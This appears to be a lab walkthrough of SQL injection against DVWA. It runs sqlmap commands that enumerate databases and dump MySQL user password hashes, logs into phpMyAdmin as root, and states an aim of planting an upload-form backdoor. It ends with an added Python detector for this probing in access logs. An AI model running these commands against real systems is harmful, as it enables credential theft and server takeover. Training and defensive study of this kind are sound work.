1. Access DVWA at "http://192.168.56.1/dvwa"
user name : admin
password : password
2. Set the DVWA security level to MEDIUM
3. Open Mantra and Burp Suite
In Mantra, follow these steps
Create a proxy for Burp Suite
Open Burp Suite
4. With the Burp Suite proxy in use, submit a single quote (')
As shown in the URL
Result in Burp Suite
5. Run sqlmap
root@bt:/pentest/database/sqlmap#
Result
Search the tables
Search the columns
Now we can see the user and password
6. OK, we have the password, but our mission is to get a backdoor onto the server, so we must try to exploit a service. I will try the MySQL service.
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "security=medium; PHPSESSID=33486pplno180m3afq6jpjout3" --dbs
=======================================================================
After that I tried again, repeating the same basic steps.
>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" -D mysql --tables
>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" -D mysql -T user --columns
>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" -D mysql -C password --dump
>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" --users --passwords
We can see that we get the same password.
>>> I try opening MySQL
I'm using the password : root
and we can see that I can manage the database. Next we will try opening phpMyAdmin.
>>> localhost/phpmyadmin
user : root
password : root
>>> Created database
Sinobi_db;
>>> Created table form
>>> Created table upload
>>> Created a form for upload.. "way for Backdoor"
Insert the data into table camp
>>> Insert data into table upload
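The probing in steps 4 and 5 is visible in the web server's access log. The Python script below is an added example, not part of the original post: it scans Apache combined-format log lines for requests to the DVWA SQL injection page whose id is not a plain integer, or whose User-Agent names sqlmap. The log lines are constructed samples, and the function name `findings` and the log layout are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not from the original post).
SAMPLE_LOG = """\
192.168.56.101 - - [10/Mar/2012:10:01:02 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4512 "-" "Mozilla/5.0 (X11; Linux i686)"
192.168.56.101 - - [10/Mar/2012:10:01:40 +0700] "GET /dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit HTTP/1.1" 200 4390 "-" "Mozilla/5.0 (X11; Linux i686)"
192.168.56.101 - - [10/Mar/2012:10:02:11 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4512 "-" "sqlmap/1.0 (constructed sample)"
192.168.56.101 - - [10/Mar/2012:10:02:30 +0700] "GET /dvwa/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux i686)"
"""

# ip, identd, user, [timestamp], "METHOD target PROTO", status, bytes, "referer", "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)
WATCHED_PATH = "/dvwa/vulnerabilities/sqli/"  # path taken from the post's sqlmap commands
NUMERIC_ID = re.compile(r"\d+")               # the page expects a numeric user id


def findings(log_text):
    """Return (ip, reason, target) for every suspicious request line."""
    out = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        url = urlsplit(m["target"])
        reasons = []
        if "sqlmap" in m["ua"].lower():
            reasons.append("sqlmap user-agent")
        if url.path == WATCHED_PATH:
            # parse_qs URL-decodes values, so %27 is compared as a literal quote;
            # keep_blank_values makes an empty id count as non-numeric too.
            for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
                if not NUMERIC_ID.fullmatch(value):
                    reasons.append("non-numeric id")
        for reason in reasons:
            out.append((m["ip"], reason, m["target"]))
    return out


if __name__ == "__main__":
    for ip, reason, target in findings(SAMPLE_LOG):
        print(f"{ip}  {reason:18}  {target}")
```

The User-Agent string is chosen by the client, so the non-numeric id rule is the one to rely on; the User-Agent rule only catches tools left on their defaults.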